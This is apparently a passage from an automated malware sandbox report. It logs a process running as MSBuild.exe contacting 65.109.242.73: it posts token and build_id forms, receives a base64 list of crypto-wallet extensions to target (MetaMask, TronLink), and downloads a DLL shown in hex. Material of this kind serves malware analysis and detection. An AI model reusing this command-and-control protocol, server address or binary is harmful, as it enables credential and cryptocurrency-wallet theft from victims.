                                                                                                                                                                                                                                            2024-04-18 08:10:22 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------EHDAFIJJECFHJJKFCAKJCont
                                                                                                                                                                                                                                            2024-04-18 08:10:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:22 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:22 UTC5165INData Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                            Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.44973765.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:23 UTC263OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJ
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 6973
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:23 UTC6973OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------AFHJJEHIEBKKFIDHDGHJCont
                                                                                                                                                                                                                                            2024-04-18 08:10:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:24 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.44973865.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:24 UTC178OUTGET /sqln.dll HTTP/1.1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:24 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 2459136
                                                                                                                                                                                                                                            Last-Modified: Sun, 14 Apr 2024 18:52:51 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            ETag: "661c2603-258600"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                            Data Ascii: X~e!*FW|>|L1146
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                                                            Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                                                                                                                            Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                                                            Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                            Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                            Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                                                            Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                                                            Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                                                            2024-04-18 08:10:25 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                                                            Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.44973965.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:27 UTC263OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBG
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 4677
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:27 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------GIDBKKKKKFBGDGDHIDBGCont
                                                                                                                                                                                                                                            2024-04-18 08:10:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:27 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            8192.168.2.44974065.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:28 UTC263OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBA
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 1529
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:28 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------DHIDHIEGIIIECAKEBFBACont
                                                                                                                                                                                                                                            2024-04-18 08:10:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            9192.168.2.44974165.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:29 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECB
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 437
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
